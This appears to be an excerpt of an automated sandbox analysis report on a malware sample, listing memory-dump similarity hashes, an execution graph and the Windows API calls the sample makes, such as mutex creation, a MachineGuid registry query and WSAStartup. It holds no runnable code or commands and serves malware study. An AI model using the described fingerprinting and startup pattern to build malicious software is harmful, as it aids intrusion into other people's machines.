                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e7bcda5366fc5771fe149dfcd99456a09d166f065aaba41b70066f4ea8f0ecda
                      • Instruction ID: f5ab04f3c9e9356a5280f0babba07a30a27cf4a7eb3a28608726bc2b7e8b3bc2
                      • Opcode Fuzzy Hash: e7bcda5366fc5771fe149dfcd99456a09d166f065aaba41b70066f4ea8f0ecda
                      • Instruction Fuzzy Hash: 1C51EFB4E0520ADFCB04CF98C6809EEBBF1BB49314F248569D905AB715D734AB41CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0374331a394b416fdb732b29c7f70e01e43412d34dff6029db14456a054160a6
                      • Instruction ID: 83778f40605a89952cf74a0e01a93e4462a158ea5e12de022c267e656c5afd21
                      • Opcode Fuzzy Hash: 0374331a394b416fdb732b29c7f70e01e43412d34dff6029db14456a054160a6
                      • Instruction Fuzzy Hash: 6251BCB4D0420A9FCB04CFA8D5818EEFBF1FB59354F248656D915AB314C330AA81DFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4b1db41a641852d808520c20d635fcf878c9ad2c29758684003b1c86bb0a22c
                      • Instruction ID: 94afdef5271006b4c2cc4d70c699a928a9503fe638af51ef8db12da108717ba3
                      • Opcode Fuzzy Hash: f4b1db41a641852d808520c20d635fcf878c9ad2c29758684003b1c86bb0a22c
                      • Instruction Fuzzy Hash: C041F4B4D0920ADFCB04CFA5C5814EEFBB1FB89310F24956AC515BB214E734AB41CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 815eb9662a4149b4b3ae1e7b193b24b630a04f1753ef4aa0c41828497c0220ce
                      • Instruction ID: be0af261c354798ad8aaeedc5f288c4de47b3733701abe6527a8148249de3f8e
                      • Opcode Fuzzy Hash: 815eb9662a4149b4b3ae1e7b193b24b630a04f1753ef4aa0c41828497c0220ce
                      • Instruction Fuzzy Hash: C141E4B4D0520ADFCB04CFA5D5814EEFBB1FB89310F24956AC515BB214E734AB41CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c05f803a86466e3033c9314dfe2dd859cef4c90d9467d1552cd7569ea75b107
                      • Instruction ID: 3adaae7aff37ea83085df69ac3dd98976588e00495c3c54e479636dda6b8f5a0
                      • Opcode Fuzzy Hash: 7c05f803a86466e3033c9314dfe2dd859cef4c90d9467d1552cd7569ea75b107
                      • Instruction Fuzzy Hash: 0341B475E04608CFEB18CFAAC944A9DFBF2AF88300F14C06AD805AB364DB749946CF55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1cc9657450065368473740933b5213140169f0645f7c19611e5981924363efa8
                      • Instruction ID: 37876cb199e23e01d204957ce12ca07a3ca86a710cce95276820380640bf70ed
                      • Opcode Fuzzy Hash: 1cc9657450065368473740933b5213140169f0645f7c19611e5981924363efa8
                      • Instruction Fuzzy Hash: 0441A1B5E04248CFEB18DFEAC544A9DBBF2AF88304F14C06AD819AB354D7349946CF55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb3d3b1ce372902dc058ea877e7ab949515067b1fa705360b8d9d6bb85dca49c
                      • Instruction ID: b249f0e2f5f5264b563ba45bd6f6bff4f78f1de667e860099970c2e38650037c
                      • Opcode Fuzzy Hash: bb3d3b1ce372902dc058ea877e7ab949515067b1fa705360b8d9d6bb85dca49c
                      • Instruction Fuzzy Hash: 644104B1D1420ADBDB04CFAAC5815EEFBB2FB88304F24C56AC416AB214E73497458F95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4797c3b67748ca03e8585729d1d074701e96cd873e725de207896a9640bb71dd
                      • Instruction ID: 4d4adffc496123223ff4fdb1385fbe0b792186828d0dabefa993c157847bc6e8
                      • Opcode Fuzzy Hash: 4797c3b67748ca03e8585729d1d074701e96cd873e725de207896a9640bb71dd
                      • Instruction Fuzzy Hash: D94104B1D1420ADBDB04CFAAD5815EEFBB6FB88300F24C56AC425AB314E734A7458F95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a357246e9b3af91348439ea59d0f455fb96e2c24b9cbe7f43c1c63a9e6614b25
                      • Instruction ID: 6d284c4963f448d42666a14b9ca6ed18a4891c9199728d0169a4c40f28cd3558
                      • Opcode Fuzzy Hash: a357246e9b3af91348439ea59d0f455fb96e2c24b9cbe7f43c1c63a9e6614b25
                      • Instruction Fuzzy Hash: 9741F274D0460AEBCB04CFEAD5815EEFBF1AB88314F14D52AC415AA314D334AA818F95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14c3724aa1020682215aa7621eadb727d8e673a44ebcc1836bcc245749f8f12b
                      • Instruction ID: f1098c2e6e3bc80220920fbaf319a94fa13c7c5a956f5afe76ea8a059f7027e8
                      • Opcode Fuzzy Hash: 14c3724aa1020682215aa7621eadb727d8e673a44ebcc1836bcc245749f8f12b
                      • Instruction Fuzzy Hash: D641F0B0D0520AEBCB04CFEAC5818EEFBB1BB89308F249569D415FB314D7309B418B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb89b72636120747391b268799174c9a4cbb8aceefaedc143bd78b5c5b7b495c
                      • Instruction ID: f7517f03fa170fc704bcc52da8782f752dbc68dc27c91961ca287eca8c8d4f78
                      • Opcode Fuzzy Hash: fb89b72636120747391b268799174c9a4cbb8aceefaedc143bd78b5c5b7b495c
                      • Instruction Fuzzy Hash: F231F2B1D0520ADBDB08DF9AC5815AEFBF2BF89300F10D46AD416A7214E734AA41CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa596de8750097ee3062b10caf111f8038f9bc5f5f4420f317823b9cdadefe86
                      • Instruction ID: a9c85be1db6a82bdc65aed26d1174e13d71421d67b5202cb16aad4b6f9b76ff1
                      • Opcode Fuzzy Hash: fa596de8750097ee3062b10caf111f8038f9bc5f5f4420f317823b9cdadefe86
                      • Instruction Fuzzy Hash: C931D475E056098BDB08CFA6C5446AEFBF2BF89300F24C46AD805AB328D7749A46CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e6c3c2916231fbd5414fef275dd6d932c2ebf42fdca717956101fc5eb9455f5
                      • Instruction ID: b8e5b7b526921a900f4511f78d45169174ca1a59621bae8a6beb91164a4c7c8f
                      • Opcode Fuzzy Hash: 0e6c3c2916231fbd5414fef275dd6d932c2ebf42fdca717956101fc5eb9455f5
                      • Instruction Fuzzy Hash: FC2128B0E016188FEB18CF6AD9403DEFBF2BFCA300F14C1AAD508AA215DB304A458F55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:1.3%
                      Total number of Nodes:300
                      Total number of Limit Nodes:13
                      execution_graph 8941 408952 8962 40823f 8941->8962 8944 408960 8946 4056bf 2 API calls 8944->8946 8947 40896a 8946->8947 8990 408862 8947->8990 8949 4089c4 8950 413aca 4 API calls 8949->8950 8951 4089d4 8950->8951 8953 405695 2 API calls 8951->8953 8952 408975 8952->8949 8998 4087d6 8952->8998 8955 4089df 8953->8955 8960 402bab 2 API calls 8961 40899d 8960->8961 8961->8949 8961->8960 8963 40824d 8962->8963 8964 40831b 8963->8964 8965 4031e5 3 API calls 8963->8965 8964->8944 8978 4083bb 8964->8978 8966 40826d 8965->8966 8967 4031e5 3 API calls 8966->8967 8968 408289 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 4082a5 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082c1 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082e2 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082ff 8975->8976 8977 4031e5 3 API calls 8976->8977 8977->8964 9026 408363 8978->9026 8981 4084ab 8981->8944 8982 4056bf 2 API calls 8987 4083f4 8982->8987 8983 408492 8984 413aca 4 API calls 8983->8984 8985 4084a0 8984->8985 8986 405695 2 API calls 8985->8986 8986->8981 8987->8983 9029 40815d 8987->9029 9044 40805d 8987->9044 9059 404b8f 8990->9059 8992 40887e 8993 4031e5 3 API calls 8992->8993 8994 40893e 8992->8994 8996 408946 8992->8996 8997 402b7c 2 API calls 8992->8997 8993->8992 9062 404a39 8994->9062 8996->8952 8997->8992 8999 402b7c 2 API calls 8998->8999 9000 4087e7 8999->9000 9001 4031e5 3 API calls 9000->9001 9005 40885a 9000->9005 9002 408802 9001->9002 9006 40884d 9002->9006 9009 408853 9002->9009 9071 408522 9002->9071 9075 4084b4 9002->9075 9003 402bab 2 API calls 9003->9005 9010 408749 9005->9010 9078 4084d4 9006->9078 9009->9003 9011 404b8f 3 API calls 9010->9011 9012 408765 9011->9012 9013 4031e5 3 API calls 9012->9013 9014 408522 3 API calls 9012->9014 9015 4087c7 9012->9015 9017 4087cf 9012->9017 9013->9012 9014->9012 9016 404a39 4 API calls 9015->9016 9016->9017 9018 4085d1 9017->9018 9019 4086c2 9018->9019 9022 4085e9 9018->9022 9019->8961 9021 402bab 2 API calls 9021->9022 9022->9019 9022->9021 9023 4031e5 3 API calls 9022->9023 9084 4089e6 9022->9084 9103 4086c9 9022->9103 9107 4036a3 9022->9107 9023->9022 9027 4031e5 3 API calls 9026->9027 9028 408386 9027->9028 9028->8981 9028->8982 9030 40816f 9029->9030 9031 4081b6 9030->9031 9032 4081fd 9030->9032 9043 4081ef 9030->9043 9034 405872 4 API calls 9031->9034 9033 405872 4 API calls 9032->9033 9035 408213 9033->9035 9036 4081cf 9034->9036 9037 405872 4 API calls 9035->9037 9038 405872 4 API calls 9036->9038 9039 408222 9037->9039 9040 4081df 9038->9040 9041 405872 4 API calls 9039->9041 9042 405872 4 API calls 9040->9042 9041->9043 9042->9043 9043->8987 9045 40808c 9044->9045 9046 4080d2 9045->9046 9047 408119 9045->9047 9058 40810b 9045->9058 9048 405872 4 API calls 9046->9048 9049 405872 4 API calls 9047->9049 9050 4080eb 9048->9050 9051 40812f 9049->9051 9052 405872 4 API calls 9050->9052 9053 405872 4 API calls 9051->9053 9054 4080fb 9052->9054 9055 40813e 9053->9055 9056 405872 4 API calls 9054->9056 9057 405872 4 API calls 9055->9057 9056->9058 9057->9058 9058->8987 9065 404a19 9059->9065 9068 4049ff 9062->9068 9064 404a44 9064->8996 9066 4031e5 3 API calls 9065->9066 9067 404a2c 9066->9067 9067->8992 9069 4031e5 3 API calls 9068->9069 9070 404a12 RegCloseKey 9069->9070 9070->9064 9072 408534 9071->9072 9074 4085af 9072->9074 9081 4084ee 9072->9081 9074->9002 9076 4031e5 3 API calls 9075->9076 9077 4084c7 9076->9077 9077->9002 9079 4031e5 3 API calls 9078->9079 9080 4084e7 9079->9080 9080->9009 9082 4031e5 3 API calls 9081->9082 9083 408501 9082->9083 9083->9074 9085 4031e5 3 API calls 9084->9085 9086 408a06 9085->9086 9087 4031e5 3 API calls 9086->9087 9091 408b21 9086->9091 9090 408a32 9087->9090 9088 408b17 9119 403649 9088->9119 9090->9088 9110 403666 9090->9110 9091->9022 9094 408b0e 9116 40362f 9094->9116 9096 4031e5 3 API calls 9097 408a88 9096->9097 9097->9094 9098 4031e5 3 API calls 9097->9098 9099 408ac4 9098->9099 9100 405b6f 5 API calls 9099->9100 9101 408aff 9100->9101 9101->9094 9113 408508 9101->9113 9104 4086e2 9103->9104 9106 408744 9103->9106 9105 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9104->9105 9104->9106 9105->9104 9106->9022 9108 4031e5 3 API calls 9107->9108 9109 4036b5 9108->9109 9109->9022 9111 4031e5 3 API calls 9110->9111 9112 403679 9111->9112 9112->9094 9112->9096 9114 4031e5 3 API calls 9113->9114 9115 40851b 9114->9115 9115->9094 9117 4031e5 3 API calls 9116->9117 9118 403642 9117->9118 9118->9088 9120 4031e5 3 API calls 9119->9120 9121 40365c 9120->9121 9121->9091 8099 402c1f 8100 4031e5 3 API calls 8099->8100 8101 402c31 LoadLibraryW 8100->8101 8058 405924 8061 4031e5 8058->8061 8062 4031f3 8061->8062 8063 403236 8061->8063 8062->8063 8065 403208 8062->8065 8072 4030a5 8063->8072 8078 403263 8065->8078 8067 4031e5 3 API calls 8069 403258 8067->8069 8068 40320d 8068->8069 8070 4030a5 3 API calls 8068->8070 8071 403224 8070->8071 8071->8067 8071->8069 8084 402ca4 8072->8084 8074 4030b0 8075 4030b5 8074->8075 8088 4030c4 8074->8088 8075->8071 8079 40326d 8078->8079 8083 4032b7 8079->8083 8097 402b7c GetProcessHeap RtlAllocateHeap 8079->8097 8081 40328c 8082 402b7c 2 API calls 8081->8082 8082->8083 8083->8068 8085 403079 8084->8085 8087 40307c 8085->8087 8092 40317b GetPEB 8085->8092 8087->8074 8089 4030eb 8088->8089 8091 4030c0 8089->8091 8094 402c03 8089->8094 8091->8071 8093 40319b 8092->8093 8093->8087 8095 4031e5 3 API calls 8094->8095 8096 402c15 8095->8096 8096->8091 8098 402b98 8097->8098 8098->8081 8102 4139de 8111 413855 8102->8111 8104 4139f1 8105 413838 GetProcessHeap RtlAllocateHeap GetPEB 8104->8105 8108 4139f7 8105->8108 8106 413866 21 API calls 8107 413a2d 8106->8107 8109 413b81 GetProcessHeap RtlAllocateHeap GetPEB ExitProcess 8107->8109 8108->8106 8110 413a34 8109->8110 8112 4031e5 3 API calls 8111->8112 8113 413864 8112->8113 8113->8113 8057 404df3 WSAStartup 10650 40f980 10663 413c87 10650->10663 10652 40fa19 10653 40fa08 10654 402bab 2 API calls 10653->10654 10654->10652 10655 40f993 10655->10652 10655->10653 10685 4060bd 10655->10685 10660 412093 6 API calls 10661 40f9f6 10660->10661 10662 412093 6 API calls 10661->10662 10662->10653 10703 413d97 10663->10703 10666 404056 5 API calls 10668 413cad 10666->10668 10667 413c9f 10667->10655 10668->10667 10669 405b6f 5 API calls 10668->10669 10671 413d10 10669->10671 10670 413d7b 10674 402bab 2 API calls 10670->10674 10671->10670 10672 403c62 3 API calls 10671->10672 10673 413d1f 10672->10673 10673->10670 10675 413d5a 10673->10675 10676 413d2c 10673->10676 10674->10667 10678 405b6f 5 API calls 10675->10678 10677 405dc5 3 API calls 10676->10677 10679 413d33 10677->10679 10680 413d55 10678->10680 10679->10680 10682 405b6f 5 API calls 10679->10682 10681 402bab 2 API calls 10680->10681 10681->10670 10683 413d48 10682->10683 10684 402bab 2 API calls 10683->10684 10684->10680 10686 4031e5 3 API calls 10685->10686 10687 4060dd 10686->10687 10688 406126 10687->10688 10689 4031e5 3 API calls 10687->10689 10688->10653 10692 40650a 10688->10692 10690 40610f 10689->10690 10766 40604f 10690->10766 10693 4060ac 3 API calls 10692->10693 10694 406519 10693->10694 10695 4031e5 3 API calls 10694->10695 10696 406529 10695->10696 10697 406599 10696->10697 10698 4031e5 3 API calls 10696->10698 10697->10660 10699 406544 10698->10699 10700 40657f 10699->10700 10702 4031e5 3 API calls 10699->10702 10701 403c40 3 API calls 10700->10701 10701->10697 10702->10700 10704 413da0 10703->10704 10707 413c96 10703->10707 10709 4065a2 10704->10709 10707->10666 10707->10667 10708 405dc5 3 API calls 10708->10707 10724 404a52 10709->10724 10711 406638 10711->10707 10711->10708 10712 4065c0 10712->10711 10736 40393f 10712->10736 10715 406631 10716 402bab 2 API calls 10715->10716 10716->10711 10717 4059d8 3 API calls 10718 4065e9 10717->10718 10720 402b7c 2 API calls 10718->10720 10723 40662a 10718->10723 10719 402bab 2 API calls 10719->10715 10721 4065f8 10720->10721 10722 402bab 2 API calls 10721->10722 10722->10723 10723->10719 10725 402b7c 2 API calls 10724->10725 10727 404a65 10725->10727 10726 404ac6 10726->10712 10727->10726 10728 4031e5 3 API calls 10727->10728 10729 404a8a RegOpenKeyExA 10728->10729 10730 404aa0 10729->10730 10731 404aca 10729->10731 10732 4031e5 3 API calls 10730->10732 10733 402bab 2 API calls 10731->10733 10734 404ab1 RegQueryValueExA 10732->10734 10733->10726 10735 404a39 4 API calls 10734->10735 10735->10726 10743 403843 10736->10743 10739 403969 10739->10715 10739->10717 10741 403961 10742 402bab 2 API calls 10741->10742 10742->10739 10744 403861 10743->10744 10745 402b7c 2 API calls 10744->10745 10747 403875 10745->10747 10746 403923 10746->10739 10762 403aef 10746->10762 10747->10746 10748 4031e5 3 API calls 10747->10748 10749 40389b 10748->10749 10749->10746 10750 4031e5 3 API calls 10749->10750 10751 4038c5 10750->10751 10752 40392a 10751->10752 10754 403666 3 API calls 10751->10754 10753 403649 3 API calls 10752->10753 10753->10746 10755 4038e7 10754->10755 10755->10752 10756 4031e5 3 API calls 10755->10756 10757 403901 10756->10757 10757->10752 10758 403911 10757->10758 10759 40362f 3 API calls 10758->10759 10760 403919 10759->10760 10761 403649 3 API calls 10760->10761 10761->10746 10763 403afc 10762->10763 10764 402b7c 2 API calls 10763->10764 10765 403b16 10764->10765 10765->10741 10767 4031e5 3 API calls 10766->10767 10768 406062 10767->10768 10768->10688

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 54 402b7c-402b96 GetProcessHeap RtlAllocateHeap 55 402ba6-402baa 54->55 56 402b98-402ba3 call 402b4e 54->56 56->55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 87 404df3-404e16 WSAStartup
                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 88 402c1f-402c37 call 4031e5 LoadLibraryW
                      APIs
                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 91 413a3f-413a57 call 4031e5 ExitProcess
                      APIs
                      • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                      • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                      • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                      • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 94 4049ff-404a18 call 4031e5 RegCloseKey
                      APIs
                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
